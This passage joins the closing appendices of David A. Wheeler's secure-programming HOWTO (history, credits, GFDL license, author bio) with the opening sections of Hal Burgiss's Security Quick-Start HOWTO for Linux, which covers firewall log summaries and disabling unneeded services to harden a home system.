Switched to GNU's GFDL license, added more content.
2000-04-21 David A. Wheeler
Version 2.00 released, dated 21 April 2000, which switched the document's
internal format from the Linuxdoc DTD to the DocBook DTD. Thanks to Jorge
Godoy for helping me perform the transition.
2000-04-04 David A. Wheeler
Version 1.60 released; changed so that it now covers both Linux and Unix.
Since most of the guidelines covered both, and many/most app developers
want their apps to run on both, it made sense to cover both.
2000-02-09 David A. Wheeler
Noted that the document is now part of the Linux Documentation Project
(LDP).
1999-11-29 David A. Wheeler
Initial version (1.0) completed and released to the public.
Note that a more detailed description of changes is available on-line in the
``ChangeLog'' file.
-----------------------------------------------------------------------------
Appendix B. Acknowledgements
    As iron sharpens iron, so one man sharpens another.
        Proverbs 27:17 (NIV)
My thanks to the following people who kept me honest by sending me emails
noting errors, suggesting areas to cover, asking questions, and so on. Where
email addresses are included, they've been shrouded by prepending my
``thanks.'' so bulk emailers won't easily get these addresses; inclusion of
people in this list is not an authorization to send unsolicited bulk email to
them.
  * Neil Brown (thanks.neilb@cse.unsw.edu.au)
  * Martin Douda (thanks.mad@students.zcu.cz)
  * Jorge Godoy
  * Scott Ingram (thanks.scott@silver.jhuapl.edu)
  * Michael Kerrisk
  * Doug Kilpatrick
  * John Levon (levon@movementarian.org)
  * Ryan McCabe (thanks.odin@numb.org)
  * Paul Millar (thanks.paulm@astro.gla.ac.uk)
  * Chuck Phillips (thanks.cdp@peakpeak.com)
  * Martin Pool (thanks.mbp@humbug.org.au)
  * Eric S. Raymond (thanks.esr@snark.thyrsus.com)
  * Marc Welz
  * Eric Werme (thanks.werme@alpha.zk3.dec.com)
If you want to be on this list, please send me a constructive suggestion at
[mailto:dwheeler@dwheeler.com] dwheeler@dwheeler.com. If you send me a
constructive suggestion, but do not want credit, please let me know that when
you send your suggestion, comment, or criticism; normally I expect that
people want credit, and I want to give them that credit. My current process
is to add contributor names to this list in the document, with more detailed
explanation of their comment in the ChangeLog for this document (available
on-line). Note that although these people have sent in ideas, the actual text
is my own, so don't blame them for any errors that may remain. Instead,
please send me another constructive suggestion.
-----------------------------------------------------------------------------
Appendix C. About the Documentation License
    A copy of the text of the edict was to be issued as law in every
    province and made known to the people of every nationality so they
    would be ready for that day.
        Esther 3:14 (NIV)
This document is Copyright (C) 1999-2000 David A. Wheeler. Permission is
granted to copy, distribute and/or modify this document under the terms of
the GNU Free Documentation License (FDL), Version 1.1 or any later version
published by the Free Software Foundation; with the invariant sections being
``About the Author'', with no Front-Cover Texts, and no Back-Cover texts. A
copy of the license is included below in Appendix D.
These terms do permit mirroring by other web sites, but be sure to do the
following:
  * make sure your mirrors automatically get upgrades from the master site,
  * clearly show the location of the master site ([http://www.dwheeler.com/
    secure-programs] http://www.dwheeler.com/secure-programs), with a
    hypertext link to the master site, and
  * give me (David A. Wheeler) credit as the author.
The first two points primarily protect me from repeatedly hearing about
obsolete bugs. I do not want to hear about bugs I fixed a year ago, just
because you are not properly mirroring the document. By linking to the master
site, users can check and see if your mirror is up-to-date. I'm sensitive to
the problems of sites which have very strong security requirements and
therefore cannot risk normal connections to the Internet; if that describes
your situation, at least try to meet the other points and try to occasionally
sneakernet updates into your environment.
By this license, you may modify the document, but you can't claim that what
you didn't write is yours (i.e., plagiarism) nor can you pretend that a
modified version is identical to the original work. Modifying the work does
not transfer copyright of the entire work to you; this is not a ``public
domain'' work in terms of copyright law. See the license in Appendix D for
details. If you have questions about what the license allows, please contact
me. In most cases, it's better if you send your changes to the master
integrator (currently David A. Wheeler), so that your changes will be
integrated with everyone else's changes into the master copy.
I am not a lawyer; nevertheless, it's my position as an author and software
developer that any code fragments not explicitly marked otherwise are so
small that their use fits under the ``fair use'' doctrine in copyright law.
In other words, unless marked otherwise, you can use the code fragments
without any restriction at all. Copyright law does not permit copyrighting
absurdly small components of a work (e.g., ``I own all rights to B-flat and
B-flat minor chords''), and the fragments not marked otherwise are of the
same kind of minuscule size when compared to real programs. I've done my best
to give credit for specific pieces of code written by others. Some of you may
still be concerned about the legal status of this code, and I want to make sure
that it's clear that you can use this code in your software. Therefore, code
fragments included directly in this document not otherwise marked have also
been released by me under the terms of the ``MIT license'', to ensure you
that there's no serious legal encumbrance:
Source code in this book not otherwise identified is
Copyright (c) 1999-2001 David A. Wheeler.
Permission is hereby granted, free of charge, to any person
obtaining a copy of the source code in this book not
otherwise identified (the "Software"), to deal in the
Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-----------------------------------------------------------------------------
Appendix D. GNU Free Documentation License
Version 1.1, March 2000
Copyright (C) 2000 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies of this license
document, but changing it is not allowed.
0. PREAMBLE
The purpose of this License is to make a manual, textbook, or other
written document "free" in the sense of freedom: to assure everyone the
effective freedom to copy and redistribute it, with or without modifying
it, either commercially or noncommercially. Secondarily, this License
preserves for the author and publisher a way to get credit for their
work, while not being considered responsible for modifications made by
others.
This License is a kind of "copyleft", which means that derivative works
of the document must themselves be free in the same sense. It complements
the GNU General Public License, which is a copyleft license designed for
free software.
We have designed this License in order to use it for manuals for free
software, because free software needs free documentation: a free program
should come with manuals providing the same freedoms that the software
does. But this License is not limited to software manuals; it can be used
for any textual work, regardless of subject matter or whether it is
published as a printed book. We recommend this License principally for
works whose purpose is instruction or reference.
1. APPLICABILITY AND DEFINITIONS
This License applies to any manual or other work that contains a notice
placed by the copyright holder saying it can be distributed under the
terms of this License. The "Document" , below, refers to any such manual
or work. Any member of the public is a licensee, and is addressed as
"you".
A "Modified Version" of the Document means any work containing the
Document or a portion of it, either copied verbatim, or with
modifications and/or translated into another language.
A "Secondary Section" is a named appendix or a front-matter section of
the Document that deals exclusively with the relationship of the
publishers or authors of the Document to the Document's overall subject
(or to related matters) and contains nothing that could fall directly
within that overall subject. (For example, if the Document is in part a
textbook of mathematics, a Secondary Section may not explain any
mathematics.) The relationship could be a matter of historical connection
with the subject or with related matters, or of legal, commercial,
philosophical, ethical or political position regarding them.
The "Invariant Sections" are certain Secondary Sections whose titles are
designated, as being those of Invariant Sections, in the notice that says
that the Document is released under this License.
The "Cover Texts" are certain short passages of text that are listed, as
Front-Cover Texts or Back-Cover Texts, in the notice that says that the
Document is released under this License.
A "Transparent" copy of the Document means a machine-readable copy,
represented in a format whose specification is available to the general
public, whose contents can be viewed and edited directly and
straightforwardly with generic text editors or (for images composed of
pixels) generic paint programs or (for drawings) some widely available
drawing editor, and that is suitable for input to text formatters or for
automatic translation to a variety of formats suitable for input to text
formatters. A copy made in an otherwise Transparent file format whose
markup has been designed to thwart or discourage subsequent modification
by readers is not Transparent. A copy that is not "Transparent" is called
"Opaque".
Examples of suitable formats for Transparent copies include plain ASCII
without markup, Texinfo input format, LaTeX input format, SGML or XML
using a publicly available DTD, and standard-conforming simple HTML
designed for human modification. Opaque formats include PostScript, PDF,
proprietary formats that can be read and edited only by proprietary word
processors, SGML or XML for which the DTD and/or processing tools are not
generally available, and the machine-generated HTML produced by some word
processors for output purposes only.
The "Title Page" means, for a printed book, the title page itself, plus
such following pages as are needed to hold, legibly, the material this
License requires to appear in the title page. For works in formats which
do not have any title page as such, "Title Page" means the text near the
most prominent appearance of the work's title, preceding the beginning of
the body of the text.
2. VERBATIM COPYING
You may copy and distribute the Document in any medium, either
commercially or noncommercially, provided that this License, the
copyright notices, and the license notice saying this License applies to
the Document are reproduced in all copies, and that you add no other
conditions whatsoever to those of this License. You may not use technical
measures to obstruct or control the reading or further copying of the
copies you make or distribute. However, you may accept compensation in
exchange for copies. If you distribute a large enough number of copies
you must also follow the conditions in section 3.
You may also lend copies, under the same conditions stated above, and you
may publicly display copies.
3. COPYING IN QUANTITY
If you publish printed copies of the Document numbering more than 100,
and the Document's license notice requires Cover Texts, you must enclose
the copies in covers that carry, clearly and legibly, all these Cover
Texts: Front-Cover Texts on the front cover, and Back-Cover Texts on the
back cover. Both covers must also clearly and legibly identify you as the
publisher of these copies. The front cover must present the full title
with all words of the title equally prominent and visible. You may add
other material on the covers in addition. Copying with changes limited to
the covers, as long as they preserve the title of the Document and
satisfy these conditions, can be treated as verbatim copying in other
respects.
If the required texts for either cover are too voluminous to fit legibly,
you should put the first ones listed (as many as fit reasonably) on the
actual cover, and continue the rest onto adjacent pages.
If you publish or distribute Opaque copies of the Document numbering more
than 100, you must either include a machine-readable Transparent copy
along with each Opaque copy, or state in or with each Opaque copy a
publicly-accessible computer-network location containing a complete
Transparent copy of the Document, free of added material, which the
general network-using public has access to download anonymously at no
charge using public-standard network protocols. If you use the latter
option, you must take reasonably prudent steps, when you begin
distribution of Opaque copies in quantity, to ensure that this
Transparent copy will remain thus accessible at the stated location until
at least one year after the last time you distribute an Opaque copy
(directly or through your agents or retailers) of that edition to the
public.
It is requested, but not required, that you contact the authors of the
Document well before redistributing any large number of copies, to give
them a chance to provide you with an updated version of the Document.
4. MODIFICATIONS
You may copy and distribute a Modified Version of the Document under the
conditions of sections 2 and 3 above, provided that you release the
Modified Version under precisely this License, with the Modified Version
filling the role of the Document, thus licensing distribution and
modification of the Modified Version to whoever possesses a copy of it.
In addition, you must do these things in the Modified Version:
A. Use in the Title Page (and on the covers, if any) a title distinct
from that of the Document, and from those of previous versions (which
should, if there were any, be listed in the History section of the
Document). You may use the same title as a previous version if the
original publisher of that version gives permission.
B. List on the Title Page, as authors, one or more persons or entities
responsible for authorship of the modifications in the Modified
Version, together with at least five of the principal authors of the
Document (all of its principal authors, if it has less than five).
C. State on the Title Page the name of the publisher of the Modified
Version, as the publisher.
D. Preserve all the copyright notices of the Document.
E. Add an appropriate copyright notice for your modifications adjacent
to the other copyright notices.
F. Include, immediately after the copyright notices, a license notice
giving the public permission to use the Modified Version under the
terms of this License, in the form shown in the Addendum below.
G. Preserve in that license notice the full lists of Invariant Sections
and required Cover Texts given in the Document's license notice.
H. Include an unaltered copy of this License.
I. Preserve the section entitled "History", and its title, and add to it
an item stating at least the title, year, new authors, and publisher
of the Modified Version as given on the Title Page. If there is no
section entitled "History" in the Document, create one stating the
title, year, authors, and publisher of the Document as given on its
Title Page, then add an item describing the Modified Version as
stated in the previous sentence.
J. Preserve the network location, if any, given in the Document for
public access to a Transparent copy of the Document, and likewise the
network locations given in the Document for previous versions it was
based on. These may be placed in the "History" section. You may omit
a network location for a work that was published at least four years
before the Document itself, or if the original publisher of the
version it refers to gives permission.
K. In any section entitled "Acknowledgements" or "Dedications", preserve
the section's title, and preserve in the section all the substance
and tone of each of the contributor acknowledgements and/or
dedications given therein.
L. Preserve all the Invariant Sections of the Document, unaltered in
their text and in their titles. Section numbers or the equivalent are
not considered part of the section titles.
M. Delete any section entitled "Endorsements". Such a section may not be
included in the Modified Version.
N. Do not retitle any existing section as "Endorsements" or to conflict
in title with any Invariant Section.
If the Modified Version includes new front-matter sections or appendices
that qualify as Secondary Sections and contain no material copied from
the Document, you may at your option designate some or all of these
sections as invariant. To do this, add their titles to the list of
Invariant Sections in the Modified Version's license notice. These titles
must be distinct from any other section titles.
You may add a section entitled "Endorsements", provided it contains
nothing but endorsements of your Modified Version by various parties--for
example, statements of peer review or that the text has been approved by
an organization as the authoritative definition of a standard.
You may add a passage of up to five words as a Front-Cover Text, and a
passage of up to 25 words as a Back-Cover Text, to the end of the list of
Cover Texts in the Modified Version. Only one passage of Front-Cover Text
and one of Back-Cover Text may be added by (or through arrangements made
by) any one entity. If the Document already includes a cover text for the
same cover, previously added by you or by arrangement made by the same
entity you are acting on behalf of, you may not add another; but you may
replace the old one, on explicit permission from the previous publisher
that added the old one.
The author(s) and publisher(s) of the Document do not by this License
give permission to use their names for publicity for or to assert or
imply endorsement of any Modified Version.
5. COMBINING DOCUMENTS
You may combine the Document with other documents released under this
License, under the terms defined in section 4 above for modified
versions, provided that you include in the combination all of the
Invariant Sections of all of the original documents, unmodified, and list
them all as Invariant Sections of your combined work in its license
notice.
The combined work need only contain one copy of this License, and
multiple identical Invariant Sections may be replaced with a single copy.
If there are multiple Invariant Sections with the same name but different
contents, make the title of each such section unique by adding at the end
of it, in parentheses, the name of the original author or publisher of
that section if known, or else a unique number. Make the same adjustment
to the section titles in the list of Invariant Sections in the license
notice of the combined work.
In the combination, you must combine any sections entitled "History" in
the various original documents, forming one section entitled "History";
likewise combine any sections entitled "Acknowledgements", and any
sections entitled "Dedications". You must delete all sections entitled
"Endorsements."
6. COLLECTIONS OF DOCUMENTS
You may make a collection consisting of the Document and other documents
released under this License, and replace the individual copies of this
License in the various documents with a single copy that is included in
the collection, provided that you follow the rules of this License for
verbatim copying of each of the documents in all other respects.
You may extract a single document from such a collection, and distribute
it individually under this License, provided you insert a copy of this
License into the extracted document, and follow this License in all other
respects regarding verbatim copying of that document.
7. AGGREGATION WITH INDEPENDENT WORKS
A compilation of the Document or its derivatives with other separate and
independent documents or works, in or on a volume of a storage or
distribution medium, does not as a whole count as a Modified Version of
the Document, provided no compilation copyright is claimed for the
compilation. Such a compilation is called an "aggregate", and this
License does not apply to the other self-contained works thus compiled
with the Document, on account of their being thus compiled, if they are
not themselves derivative works of the Document. If the Cover Text
requirement of section 3 is applicable to these copies of the Document,
then if the Document is less than one quarter of the entire aggregate,
the Document's Cover Texts may be placed on covers that surround only the
Document within the aggregate. Otherwise they must appear on covers
around the whole aggregate.
8. TRANSLATION
Translation is considered a kind of modification, so you may distribute
translations of the Document under the terms of section 4. Replacing
Invariant Sections with translations requires special permission from
their copyright holders, but you may include translations of some or all
Invariant Sections in addition to the original versions of these
Invariant Sections. You may include a translation of this License
provided that you also include the original English version of this
License. In case of a disagreement between the translation and the
original English version of this License, the original English version
will prevail.
9. TERMINATION
You may not copy, modify, sublicense, or distribute the Document except
as expressly provided for under this License. Any other attempt to copy,
modify, sublicense or distribute the Document is void, and will
automatically terminate your rights under this License. However, parties
who have received copies, or rights, from you under this License will not
have their licenses terminated so long as such parties remain in full
compliance.
10. FUTURE REVISIONS OF THIS LICENSE
The Free Software Foundation may publish new, revised versions of the GNU
Free Documentation License from time to time. Such new versions will be
similar in spirit to the present version, but may differ in detail to
address new problems or concerns. See [http://www.gnu.org/copyleft/]
http://www.gnu.org/copyleft/.
Each version of the License is given a distinguishing version number. If
the Document specifies that a particular numbered version of this License
"or any later version" applies to it, you have the option of following
the terms and conditions either of that specified version or of any later
version that has been published (not as a draft) by the Free Software
Foundation. If the Document does not specify a version number of this
License, you may choose any version ever published (not as a draft) by
the Free Software Foundation.
Addendum
To use this License in a document you have written, include a copy of the
License in the document and put the following copyright and license
notices just after the title page:
Copyright © YEAR YOUR NAME.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.1 or any
later version published by the Free Software Foundation; with the
Invariant Sections being LIST THEIR TITLES, with the Front-Cover Texts
being LIST, and with the Back-Cover Texts being LIST. A copy of the
license is included in the section entitled "GNU Free Documentation
License".
If you have no Invariant Sections, write "with no Invariant Sections"
instead of saying which ones are invariant. If you have no Front-Cover
Texts, write "no Front-Cover Texts" instead of "Front-Cover Texts being
LIST"; likewise for Back-Cover Texts.
If your document contains nontrivial examples of program code, we
recommend releasing these examples in parallel under your choice of free
software license, such as the GNU General Public License, to permit their
use in free software.
-----------------------------------------------------------------------------
Appendix E. Endorsements
This version of the document is endorsed by the original author, David A.
Wheeler, as a document that should improve the security of programs, when
applied correctly. Note that no book, including this one, can guarantee that
a developer who follows its guidelines will produce perfectly secure
software. Modifications (including translations) must remove this appendix
per the license agreement included above.
-----------------------------------------------------------------------------
Appendix F. About the Author
David A. Wheeler
David A. Wheeler is an expert in computer security and has long specialized
in development techniques for large and high-risk software systems. He has
been involved in software development since the mid-1970s, and been involved
with Unix and computer security since the early 1980s. His areas of knowledge
include computer security, software safety, vulnerability analysis,
inspections, Internet technologies, software-related standards (including
POSIX), real-time software development techniques, and numerous computer
languages (including Ada, C, C++, Perl, Python, and Java).
Mr. Wheeler is co-author and lead editor of the IEEE book Software
Inspection: An Industry Best Practice, author of the book Ada95: The Lovelace
Tutorial, and co-author of the GNOME User's Guide. He is also the author of
many smaller papers and articles, including the Linux Program Library HOWTO.
Mr. Wheeler hopes that, by making this document available, other developers
will make their software more secure. You can reach him by email at
dwheeler@dwheeler.com (no spam please), and you can also see his web site at
[http://www.dwheeler.com] http://www.dwheeler.com.
Notes
[1] Technically, a hypertext link can be any ``uniform resource identifier''
(URI). The term "Uniform Resource Locator" (URL) refers to the subset of
URIs that identify resources via a representation of their primary
access mechanism (e.g., their network "location"), rather than
identifying the resource by name or by some other attribute(s) of that
resource. Many people use the term ``URL'' as synonymous with ``URI'',
since URLs are the most common kind of URI. For example, the encoding
used in URIs is actually called ``URL encoding''.
Security Quick-Start HOWTO for Linux
Hal Burgiss
     hal@foobox.net
v. 1.2, 2002-07-21
Revision History
Revision v. 1.2 2002-07-21 Revised by: hb
A few small additions, and fix the usual broken links.
Revision v. 1.1 2002-02-06 Revised by: hb
A few fixes, some additions and many touch-ups from the original.
Revision v. 1.0 2001-11-07 Revised by: hb
Initial Release.
This document is an overview of the basic steps required to secure a Linux
installation from intrusion. It is intended to be an introduction.
-----------------------------------------------------------------------------
Table of Contents
1. Introduction
1.1. Why me?
1.2. Copyright
1.3. Credits
1.4. Disclaimer
1.5. New Versions and Changelog
1.6. Feedback
2. Foreword
2.1. The Optimum Configuration
2.2. Before We Start
3. Step 1: Which services do we really need?
3.1. System Audit
3.2. The Danger Zone (or r00t m3 pl34s3)
3.3. Stopping Services
3.4. Exceptions
3.5. Summary and Conclusions for Step 1
4. Step 2: Updating
4.1. Summary and Conclusions for Step 2
5. Step 3: Firewalls and Setting Access Policies
5.1. Strategy
5.2. Packet Filters -- Ipchains and Iptables
5.3. Tcpwrappers (libwrap)
5.4. PortSentry
5.5. Proxies
5.6. Individual Applications
5.7. Verifying
5.8. Logging
5.9. Where to Start
5.10. Summary and Conclusions for Step 3
6. Intrusion Detection
6.1. Intrusion Detection Systems (IDS)
6.2. Have I Been Hacked?
6.3. Reclaiming a Compromised System
7. General Tips
8. Appendix
8.1. Servers, Ports, and Packets
8.2. Common Ports
8.3. Netstat Tutorial
8.4. Attacks and Threats
8.5. Links
8.6. Editing Text Files
8.7. nmap
8.8. Sysctl Options
8.9. Secure Alternatives
8.10. Ipchains and Iptables Redux
1. Introduction
1.1. Why me?
Who should be reading this document, and why should the average Linux user
care about security? Those new to Linux, or unfamiliar with the inherent
security issues of connecting a Linux system to large networks like the
Internet, should be reading. "Security" is a broad subject with many facets,
and is covered in much more depth in other documents, books, and on various
sites on the Web. This document is intended as an introduction to the most
basic concepts as they relate to Linux, and as a starting point only.
 Iptables Weekly Log Summary from Jul 15 04:24:13 to Jul 22 04:06:00
 Blocked Connection Attempts:

 Rejected tcp packets by destination port
 port                 count
 111                  19
 53                   12
 21                   9
 515                  9
 27374                8
 443                  6
 1080                 2
 1138                 1

 Rejected udp packets by destination port
 port                 count
 137                  34
 22                   1
The above is real, live data from a one week period for my home LAN. Much of
the above would seem to be specifically targeted at Linux systems. Many of
the targeted "destination" ports are used by well known Linux and Unix
services, and all may be installed, and possibly even running, on your
system.
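A weekly summary like the one above can be produced from the kernel log with a
short pipeline. The sketch below is illustrative only: it assumes your
firewall logs dropped packets with an iptables LOG rule, so that each logged
line carries the kernel's PROTO= and DPT= fields, and the function name and
log file path are our own inventions, not standard tools.

```shell
#!/bin/sh
# Count rejected packets by destination port from iptables LOG entries read
# on stdin. Assumes log lines contain PROTO= and DPT= fields, as written by
# a rule such as:  iptables -A INPUT -j LOG --log-prefix "Rejected: "
port_summary() {
    grep "PROTO=$1" \
        | grep -o 'DPT=[0-9]*' \
        | cut -d= -f2 \
        | sort | uniq -c | sort -rn \
        | awk '{ printf "%-20s %s\n", $2, $1 }'
}

# Example usage (the log file location is an assumption; adjust to wherever
# your syslog configuration sends kernel messages):
#   port_summary TCP < /var/log/messages
#   port_summary UDP < /var/log/messages
```

The heavy lifting is done by `uniq -c`, which counts consecutive duplicate
lines (hence the preceding `sort`), and `sort -rn`, which puts the most-hit
ports first.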
The focus here will be on threats that are shared by all Linux users, whether
a dual-boot home user or a large commercial site. And we will take a few
relatively quick and easy steps that will make a typical home desktop or
small office system running Linux reasonably safe from the majority of
outside threats. Those responsible for Linux systems in a larger or more
complex environment would be well advised to read this, and then follow up
with additional reading suited to their particular situation. Actually, this
is probably good advice for everybody.
We will assume the reader knows little about Linux, networking, TCP/IP, and
the finer points of running a server Operating System like Linux. We will
also assume, for the sake of this document, that all local users are
"trusted" users, and won't address physical or local network security issues
in any detail. Again, if this is not the case, further reading is strongly
recommended.
The principles that will guide us in our quest are:
  * There is no magic bullet. There is no one single thing we can do to make
    us secure. It is not that simple.
  * Security is a process that requires maintenance, not an objective to be
    reached.
  * There is no 100% safe program, package or distribution. Just varying
    degrees of insecurity.
The steps we will be taking to get there are:
  * Step 1: Turn off, and perhaps uninstall, any and all unnecessary
    services.
  * Step 2: Make sure that any services that are installed are updated and
    patched to the current, safe version -- and then stay that way. Every
    server application has potential exploits. Some have just not been found
    yet.
  * Step 3: Limit connections to us from outside sources by implementing a
    firewall and/or other restrictive policies. The goal is to allow only the
    minimum traffic necessary for whatever our individual situation may be.
  * Awareness. Know your system, and how to properly maintain and secure it.
    New vulnerabilities are found, and exploited, all the time. Today's
    secure system may have tomorrow's as yet unfound weaknesses.
If you don't have time to read everything, concentrate on Steps 1, 2, and 3.
This is where the meat of the subject matter is. The Appendix has a lot of
supporting information, which may be helpful, but may not be necessary for
all readers.
-----------------------------------------------------------------------------
1.2. Copyright
Security-Quickstart HOWTO for Linux
Copyright © 2001 Hal Burgiss.
This document is free; you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software
Foundation; either version 2 of the License, or (at your option) any later
version.
This document is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You can get a copy of the GNU GPL at [http://www.gnu.org/copyleft/gpl.html]
http://www.gnu.org/copyleft/gpl.html.
-----------------------------------------------------------------------------
1.3. Credits
Many thanks to those who helped with the production of this document.
  * Bill Staehle, who has done a little bit of everything: ideas, editing,
    encouragement, and suggestions, many of which have been incorporated.
    Bill helped greatly with the content of this document.
  * Others who have contributed in one way or another: Dave Wreski, Ian
    Jones, Jacco de Leeuw, and Indulis Bernsteins.
  * Various posters on comp.os.linux.security, a great place to learn about
    Linux and security.
  * The Netfilter Development team for their work on iptables and connection
    tracking, state of the art tools with which to protect our systems.
-----------------------------------------------------------------------------
1.4. Disclaimer
The author accepts no liability for the contents of this document. Use the
concepts, examples and other content at your own risk. As this is a new
document, there may be errors and inaccuracies. Hopefully these are few and
far between. Corrections and suggestions are welcomed.
This document is intended to give the new user a starting point for securing
their system while it is connected to the Internet. Please understand that
there is no intention whatsoever of claiming that the contents of this
document will necessarily result in an ultimately secure and worry-free
computing environment. Security is a complex topic. This document just
addresses some of the most basic issues that inexperienced users should be
aware of.
The reader is encouraged to read other security related documentation and
articles. And to stay abreast of security issues as they evolve. Security is
not an objective, but an ongoing process.
-----------------------------------------------------------------------------
1.5. New Versions and Changelog
The current official version can always be found at [http://www.tldp.org/
HOWTO/Security-Quickstart-HOWTO/] http://www.tldp.org/HOWTO/
Security-Quickstart-HOWTO/. Pre-release versions can be found at
[http://feenix.burgiss.net/ldp/quickstart/]
http://feenix.burgiss.net/ldp/quickstart/.
Other formats, including PDF, PS, single page HTML, may be found at the Linux
Documentation HOWTO index page: [http://tldp.org/docs.html#howto] http://
tldp.org/docs.html#howto.
Changelog:
Version 1.2: Clarifications on example firewall scripts, and small additions
to 'Have I been Hacked'. Note on Zonealarm type applications. More on the use
of "chattr" by script kiddies, and how to check for this. Other small
additions and clarifications.
Version 1.1: Various corrections, amplifications and numerous mostly small
additions. Too many to list. Oh yea, learn to spell Red Hat correctly ;-)
Version 1.0: This is the initial release of this document. Comments welcomed.
-----------------------------------------------------------------------------
1.6. Feedback
Any and all comments on this document are most welcomed. Please make sure you
have the most current version before submitting corrections or suggestions!
These can be sent to <hal@foobox.net>.
-----------------------------------------------------------------------------
2. Foreword
Before getting into specifics, let's try to briefly answer some questions
about why we need to be concerned about security in the first place.
It is easy to see why an e-commerce site, an on-line bank, or a government
agency with sensitive documents would be concerned about security. But what
about the average user? Why should even a Linux home Desktop user worry about
security?
Anyone connected to the Internet is a target, plain and simple. It makes
little difference whether you have a part-time dialup connection, or a
full-time connection, though full-time connections make for bigger targets.
Larger sites make for bigger targets too, but this does not let small users
off the hook since the "small user" may be less skilled and thus an easier
victim.
There are those out there that are scanning just for easy victims all the
time. If you start logging unwanted connection attempts, you will see this
soon enough. There is little doubt that many of these attempts are
maliciously motivated and the attacker, in some cases, is looking for Linux
boxes to crack. Does someone on the other side of the globe really want to
borrow my printer?
What do they want? Often, they just may want your computer, your IP address,
and your bandwidth. Then they use you to either attack others, or possibly
commit crimes or mischief and are hiding their true identity behind you. This
is an all too common scenario. Commercial and high-profile sites are targeted
more directly and have bigger worries, but we all face this type of common
threat.
With a few reasonable precautions, Linux can be very secure, and with all the
available tools, makes for a fantastically fun and powerful Internet
connection or server. Most successful break-ins are the result of ignorance
or carelessness.
The bottom line is:
  * Do you want control of your own system or not?
  * Do you want to unwittingly participate in criminal activity?
  * Do you want to be used by someone else?
  * Do you want to risk losing your Internet connection?
  * Do you want to have to go through the time consuming steps of reclaiming
    your system?
  * Do you want to chance the loss of data on your system?
These are all real possibilities, unless we take the appropriate precautions.
Warning: If you are reading this because you have already been broken into,
or suspect that you have, you cannot trust any of your system utilities
to provide reliable information. And the suggestions made in the next
several sections will not help you recover your system. Please jump
straight to the Have I been Hacked? section, and read that first.
-----------------------------------------------------------------------------
2.1. The Optimum Configuration
Ideally, we would want one computer as a dedicated firewall and router. This
would be a bare bones installation, with no servers running, and only the
required services and components installed. The rest of our systems would
connect via this dedicated router/firewall system. If we wanted publicly
accessible servers (web, mail, etc), these would be in a "DMZ"
(De-militarized Zone). The router/firewall allows connections from outside to
whatever services are running in the DMZ by "forwarding" these requests, but
it is segregated from the rest of the internal network (aka LAN) otherwise.
This leaves the rest of the internal network in fairly secure isolation, and
relative safety. The "danger zone" is confined to the DMZ.
But not everyone has the hardware to dedicate to this kind of installation.
This would require a minimum of two computers. Or three, if you would be
running any publicly available servers (not a good idea initially). Or maybe
you are just new to Linux, and don't know your way around well enough yet. So
if we can't do the ideal installation, we will do the next best thing.
-----------------------------------------------------------------------------
2.2. Before We Start
Before we get to the actual configuration sections, a couple of notes.
First, one of the interesting aspects of Linux is the different
distributions, like Caldera, Red Hat, SuSE, and Debian. While these are all
"Linux", and may share certain features, there are certainly differences as
to which utilities they install by default. Most Linux distributions will
write their own system configuration tools as well. And with Linux, there is
always more than one way to skin a cat. But for the purposes of our
discussion, we will have to use as generic a set of tools as we can.
Unfortunately, GUI tools don't lend themselves to this type of documentation.
We will be using text based, command line tools for the most part. If you are
familiar with your distribution's utilities, feel free to substitute those in
appropriate places. And if not, you should learn them or suitable
alternatives.
The next several sections have been written such that you can perform the
recommended procedures as you read along. This is the "Quick Start" in the
document title!
To get ready, what you will need for the configuration sections below:
  * A text editor. There are many available. If you use a file manager
    application, it probably has a built-in editor. This will be fine. pico
    and mcedit are two relatively easy to use editors if you don't already
    have a favorite. There is a quick guide to Text editors in the Appendix
    that might help you get started. It is always a good idea to make a
    backup copy before editing system configuration files.
  * For non-GUI editors and some of the commands, you will also need a
    terminal window opened. xterm, rxvt, and gnome-terminal all will work, as
    well as others.
  * You should also be familiar with your distribution's method of stopping
    services from running on each boot, how it installs (and uninstalls)
    packages (rpm, deb, etc.), and where to find the updates for your
    release. This information is available in your release's documentation,
    or on your vendor's web site.
We'll be using a hypothetical system here for examples with the hostname
"bigcat". Bigcat is a Linux desktop with a fresh install of the latest/
greatest Linux distro running. Bigcat has a full-time, direct Internet
connection. Even if your installation is not so "fresh", don't be deterred.
Better late than never.
-----------------------------------------------------------------------------
3. Step 1: Which services do we really need?
In this section we will see which services are running on our freshly
installed system, decide which we really need, and do away with the rest. If
you are not familiar with how servers and TCP connections work, you may want
to read the section on servers and ports in the Appendix first. If not
familiar with the netstat utility, you may want to read a quick overview of
it beforehand. There is also a section in the Appendix on ports, and
corresponding services. You may want to look that over too.
Our goal is to turn off as many services as possible. If we can turn them all
off, or at least off to outside connections, so much the better. Some rules
of thumb we will use to guide us:
  * It is perfectly possible to have a fully functional Internet connection
    with no servers running that are accessible to outside connections. Not
    only possible, but desirable in many cases. The principle here is that
    you will never be successfully broken into via a port that is not opened
    because no server is listening on it. No server == no port open == not
    vulnerable. At least to outside connections.
  * If you don't recognize a particular service, chances are good you don't
    really need it. We will assume that, and so we'll turn it off. This may
    sound dangerous, but is a good rule of thumb to go by.
  * Some services are just not intended to be run over the Internet -- even
    if you decide it is something you really do need. We'll flag these as
    dangerous, and address them in later sections, should you decide you do
